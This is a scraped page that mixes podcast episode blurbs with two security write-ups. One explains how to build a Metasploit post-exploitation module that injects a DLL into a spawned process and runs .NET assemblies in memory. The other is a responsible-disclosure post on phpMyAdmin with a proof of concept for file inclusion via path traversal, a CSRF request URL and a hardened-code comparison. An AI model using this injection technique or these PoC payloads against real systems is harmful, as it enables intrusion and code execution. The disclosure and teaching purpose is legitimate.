Community Cyber-Attacks, Simulations and Cooperation | Guest Michael Figueroa
Michael Figueroa discusses the ACSC's first collaborative defense simulation and defending against community-level attacks.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
How to Launch a Career in Application Security | Guest Dan Cornell
Learn about AppSec careers in this discussion with Dan Cornell, chief technology officer at Denim Group.
Red Team Operations: Attack and Think Like a Criminal | Guest Jeremy Martin
Dig into the mindset of an attacker with senior security researcher Jeremy Martin.
Career Advice from McAfee’s Lead Scientist | Guest Christiaan Beek
McAfee's Christiaan Beek discusses his career path and the No More Ransom project.
Cyber Threat Hunting: Identify and Hunt Down Intruders | Guest Jeremy Martin
Learn what it takes to be a modern-day threat hunter with senior security researcher Jeremy Martin.
What’s It Like to be a High-End Red Team Member? | Guest David "Moose" Wolpoff
David "Moose" Wolpoff, CTO of Randori, gives a glimpse into the life of a Red Team Operations professional.
Execute assembly via Meterpreter session
Background
To run a PE file, Windows relies on reading its header. The PE header describes how the file should be loaded in memory, which dependencies it has and where the entry point is. What about a .NET assembly? Its entry point is somewhere in the IL code. Executing the assembly directly at that entry point in the intermediate code would cause an error, because the intermediate code is not meant to be executed first: the runtime must load the intermediate code and then execute it.
Hosting CLR
In previous versions of Windows, execution is passed to an entry point where the boot code is located. The startup code is native code and uses the unmanaged CLR API to start the .NET runtime within the current process and launch the real program, that is, the IL code. This could be a good strategy to achieve the result. The final aim is to run the assembly directly in memory, so the DLL must have the assembly somewhere in memory, along with any command-line parameters and a reference to the memory area that contains them.
Execute Assembly
So I need to create a post-exploitation module that performs the following steps:
- Spawn a process to host CLR (meterpreter)
- Reflectively Load HostCLR dll (meterpreter)
- Copy the assembly into the spawned process memory area (meterpreter)
- Copy the parameters into the spawned process memory area (meterpreter)
- Read assembly and parameters (dll)
- Execute the assembly (dll)
To start the Host process, metasploit provides Process.execute which has the following signature:
Process.execute (path, arguments = nil, opts = nil)
The interesting part is the opts parameter, which accepts:
- Hidden
- Channelized
- Suspended
- InMemory
By setting Channelized to true, I can read the assembly output for free with the call
notepad_process.channel.read
Once the Host process is created, Metasploit provides some functions for interacting with the memory of a remote process:
- inject_dll_into_process
- memory.allocate
- memory.write
The inject_dll_into_process function copies the binary passed as an argument into a read-write-execute memory area and returns its address together with the offset of the DLL's entry point.
exploit_mem, offset = inject_dll_into_process (process, library_path)
The memory.allocate function allocates memory with the required protection mode. In this case I will write the parameters and the assembly into the allocated memory area; neither of these two elements needs the memory to be executable, so I will set RW.
I decided to organize the memory area dedicated to parameters and assemblies as follows:
- 1024 bytes for the parameters
- 1M for the assembly
assembly_mem = process.memory.allocate (1025024, PAGE_READWRITE)
The third method writes data to a specified memory address.
process.memory.write (assembly_mem, params + File.read (exe_path))
Now I have the memory address of the DLL, the offset to the entry point, and the memory address of both the parameters and the assembly to be executed. Considering the function
Thread.create (entry, parameter = nil, suspended = false)
I can use the memory address of the DLL plus the offset as the value of the entry parameter, and the address of the parameter-and-assembly memory area as the value of the parameter parameter.
process.thread.create (exploit_mem + offset, assembly_mem)
This results in a call to the entry point with an LPVOID pointer as input parameter.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
That is all I need to recover the parameters to be passed to the assembly and the assembly itself.
ReadProcessMemory(GetCurrentProcess(), lpPayload, allData, RAW_ASSEMBLY_LENGTH + RAW_AGRS_LENGTH, &readed);
About the assemblies to be executed, it is important to note that the signature of the Main method must match the parameters that have been set in the module, for example:
- If the property ARGUMENTS is set to "antani sblinda destra", the Main method should be "static void Main(string[] args)"
- If the property ARGUMENTS is set to "", the Main method should be "static void Main()"
Chaining with SharpGen
A few days ago I read a blog post from @cobb_io where he presented an interesting tool for inline compilation of .NET assemblies. By default the execute-assembly module looks for assemblies in $(metasploit-framework-home)/data/execute-assembly, but this behavior can be changed by setting the property ASSEMBLYPATH, for example by pointing it at the SharpGen output folder. In this way I can compile the assemblies and execute them directly with the module.
DNS Exploits, Concerns and Easy Fixes | Guest Andrew Wertkin
Andrew Wertkin, CTO at BlueCat Networks, discusses DNS security.
Malware Removal and Security Tips with Malwarebytes | Guest Michael Sherwood
Michael Sherwood, senior director of technician services at Malwarebytes, talks malware.
PHPMyAdmin multiple vulnerabilities
During an assignment, I found several serious vulnerabilities in phpMyAdmin, which is an application massively used to manage MariaDB and MySQL databases. One of them potentially leads to arbitrary code execution by exploiting a Local file inclusion, while the other is a CSRF allowing any table entry to be edited.
1. Local file inclusion in the transformation feature
The transformation feature of phpMyAdmin allows a column to be displayed in a specific way when it is selected from a table. For example, it can turn links stored as plain text into clickable links when rendering them.
Those transformations are defined in PHPMyAdmin’s “column_info” system table, which usually resides in the phpmyadmin database. However, every database can ship its own version of phpmyadmin system tables. For creating phpmyadmin system tables for a specific database, the following call can be used: http://phpmyadmin/chk_rel.php?fixall_pmadb=1&db=*yourdb*.
It will create a set of pma__* tables into your database.
Here is an example of how the transformation is applied, from tbl_replace.php:
<?php
$mime_map = Transformations::getMIME($GLOBALS['db'], $GLOBALS['table']);
[...]
// Apply Input Transformation if defined
if (!empty($mime_map[$column_name])
    && !empty($mime_map[$column_name]['input_transformation'])
) {
    $filename = 'libraries/classes/Plugins/Transformations/'
        . $mime_map[$column_name]['input_transformation'];
    if (is_file($filename)) {
        include_once $filename;
        $classname = Transformations::getClassName($filename);
        /** @var IOTransformationsPlugin $transformation_plugin */
        $transformation_plugin = new $classname();
        $transformation_options = Transformations::getOptions(
            $mime_map[$column_name]['input_transformation_options']
        );
        $current_value = $transformation_plugin->applyTransformation(
            $current_value, $transformation_options
        );
        // check if transformation was successful or not
        // and accordingly set error messages & insert_fail
        if (method_exists($transformation_plugin, 'isSuccess')
            && !$transformation_plugin->isSuccess()
        ) {
            $insert_fail = true;
            $row_skipped = true;
            $insert_errors[] = sprintf(
                __('Row: %1$s, Column: %2$s, Error: %3$s'),
                $rownumber, $column_name,
                $transformation_plugin->getError()
            );
        }
    }
}
The transformation is fetched from the “pma__column_info” system table in the current database, or from the “phpmyadmin” database instead. The “input_transformation” column is used as a filename to include, and is vulnerable to a path traversal that leads to a local file inclusion.
Here is a PoC to exploit this vulnerability:
- Create a new database “foo” with a “bar” table containing a “baz” column, and insert a row containing PHP code (to fill the session with some PHP code):
CREATE DATABASE foo;
CREATE TABLE foo.bar ( baz VARCHAR(255) PRIMARY KEY );
INSERT INTO foo.bar SELECT '<?php phpinfo() ?>';
- Create the phpMyAdmin system tables in your DB by calling http://phpmyadmin/chk_rel.php?fixall_pmadb=1&db=foo
- Fill the transformation information with the path traversal in the “pma__column_info” table:
INSERT INTO `pma__column_info` SELECT '1', 'foo', 'bar', 'baz', 'plop',
'plop', 'plop', 'plop',
'[path_traversal]/var/lib/php/sessions/sess_{yourSessionId}', 'plop';
- Browsing to http://phpmyadmin/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1 will trigger the phpinfo(); call.
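The include site from tbl_replace.php, as an added example that is not part of the original post or of phpMyAdmin's own code: the vulnerable lookup beside a hardened one that allowlists the file name and confines the resolved path to the plugin directory. The temporary directory, the stand-in plugin file name Text_Plain_Link.php and the sess_demo file are constructed for the demo.

```php
<?php
// Added example (not phpMyAdmin's code). $pluginDir stands in for the
// 'libraries/classes/Plugins/Transformations/' prefix used in tbl_replace.php.
declare(strict_types=1);

// Vulnerable shape: a database-controlled string is appended to a directory
// and would be handed to include_once, so "../" walks out of the plugin folder.
function vulnerableTransformationFile(string $inputTransformation, string $pluginDir): ?string
{
    $filename = $pluginDir . '/' . $inputTransformation;
    return is_file($filename) ? $filename : null;
}

// Hardened: only a bare "<Name>.php" component is accepted, and the resolved
// path must still lie inside the plugin directory after realpath().
function safeTransformationFile(string $inputTransformation, string $pluginDir): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_]+\.php\z/', $inputTransformation)) {
        return null; // separators, "..", NUL bytes and non-.php names never get here
    }
    $base = realpath($pluginDir);
    $path = realpath($pluginDir . DIRECTORY_SEPARATOR . $inputTransformation);
    if ($base === false || $path === false) {
        return null;
    }
    // Compare with the trailing separator so a sibling "Transformations2/" cannot match.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed fixture: a throwaway tree with one legitimate plugin file and a
// session file outside it, standing in for /var/lib/php/sessions/sess_<id>.
$root = sys_get_temp_dir() . '/pma_demo_' . getmypid();
$pluginDir = $root . '/libraries/classes/Plugins/Transformations';
mkdir($pluginDir, 0700, true);
mkdir($root . '/sessions', 0700, true);
file_put_contents($pluginDir . '/Text_Plain_Link.php', "<?php // legitimate plugin\n");
file_put_contents($root . '/sessions/sess_demo', "<?php phpinfo(); ?>\n");

$cases = [
    'Text_Plain_Link.php',             // legitimate row value: both accept
    '../../../../sessions/sess_demo',  // traversal as in the PoC: only the vulnerable one accepts
];
foreach ($cases as $value) {
    printf("%-34s vulnerable: %-8s hardened: %s\n", $value,
        vulnerableTransformationFile($value, $pluginDir) ? 'includes' : 'rejects',
        safeTransformationFile($value, $pluginDir) ? 'includes' : 'rejects');
}
```

The regex check alone already stops the traversal; the realpath containment is the second line of defence in case the allowlist is ever loosened.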
2. CSRF for updating data in table
This vulnerability is pretty easy to understand. A simple GET request can be used to update data in a table. Here is an example:
http://phpmyadmin/tbl_replace.php?db=*yourDB*&table=*yourTable*&fields_name[multi_edit][0][0]=*fieldToEdit*&fields[multi_edit][0][0]=*fieldNewValue*&clause_is_unique=1&where_clause=*whereClause*
A malicious user could force a logged-in user to update arbitrary tables in arbitrary DBs. This can also be used in a simple <img> element on forums or elsewhere, as the request is a simple GET one.
These vulnerabilities are both important. We responsibly disclosed them and they were patched on the newly released phpMyAdmin 4.8.4.
Timeline:
- 2018.06.21 – Initial contact with phpMyAdmin security team.
- 2018.06.24 – Initial response that the team will investigate.
- 2018.08.02 – Request for news.
- 2018.08.28 – Re-request for news.
- 2018.08.31 – Response from phpMyAdmin team that they’re still in the process of fixing things.
- 2018.11.01 – Request for news.
- 2018.12.07 – Apologies from phpMyAdmin + explanation that a lot of code rewrite was necessary for multiple CSRF flaws.
- 2018.12.11 – New version released with patch.
Update your things!
10 Proven Security Awareness Tips From Osterman Research | Guest Michael Osterman
Michael Osterman, president and analyst at Osterman Research, shares security awareness tips and strategies
Drilling Holes in ATMs, Card Skimming and Other Fraud | Guest Stan Engelbrecht
Stan Engelbrecht, director of cyber security practice for D3 Security, discusses ATM fraud.
Are Third-Party Vendors Your Biggest Cybersecurity Risk? | Guest Fred Kneip
Fred Kneip, CEO of CyberGRX, discusses the growth of risk from third-party vendors.
Transform Your Organization with a Security Champion | Guest Jeff Williams
OWASP co-founder Jeff Williams discusses how developing a Security Champion can make your organization more secure.
Securing the Internet-of-Things (IoT) | Guest Dr. Jared DeMott
Dr. Jared DeMott, CEO and founder of VDA Labs, chats about the security risks associated with the Internet of Things (IoT).
Developing Security Champions within DevOps | Guest Ty Sbano
Ty Sbano, head of security at Periscope Data, talks about building Security Champions in the world of DevOps.
How is Cybercrime Impacting the Financial Sector? | Guest Todd Weller
Todd Weller, chief strategy officer at Bandura Systems, discusses cybercrime in the financial sector and how to build a security awareness program on a budget.
New Phishing Trends, Old Tactics and Security Awareness | Guest Pedram Amini
Pedram Amini, creator of the Zero Day Initiative, talks about how phishing has changed — and stayed the same — over recent years.
Get Started in Cybersecurity: Beginner Tips, Certifications and Career Paths | Guest Keatron Evans
Cybersecurity professional Keatron Evans shares tips for those looking to break into the industry or change careers.
Armed Services, Social Engineering and Sensationalist Reporting | Guest Michel Huffaker
Michel Huffaker, director of threat intelligence at ThreatQuotient, talks about cybersecurity issues facing the military.
Breaking into IT: From First Job to Advanced Certs with CompTIA | Teresa Sears and Christine Tuttleman
CompTIA subject matter experts discuss beginner IT jobs, skills and certifications
Midterm Elections, Hacking and Information Warfare | Guest John Dickson
John Dickson, Principal at Denim Group, talks about cybersecurity issues related to the upcoming midterm elections.
Defending Against and Recovering from Ransomware | Guest Bill Siegel
Bill Siegel, co-founder of ransomware-recovery company Coveware, discusses ransomware trends.
Turn the Tables on Your Attackers with Deception Technology | Guest Carolyn Crandall
Chief deception officer Carolyn Crandall talks about using deception technology to trick attackers and protect organizations.
CISSP Exam Changes: Tips to Pass the New CAT Format (and Free E-book) | Guest Ken Magee
Learn everything you need to pass the new CISSP exam in this discussion with InfoSec Instructor Ken Magee.
Privacy and Anonymity in the Modern World | Guest Lance Cottrell
Lance Cottrell of Ntrepid discusses the evolution of online privacy and anonymity.
Healthcare’s Many Cybersecurity Challenges | Guest Lisa Hedges
Lisa Hedges, content analyst at Software Advice, Gartner Digital Markets, talks about the many cybersecurity challenges facing the healthcare sector.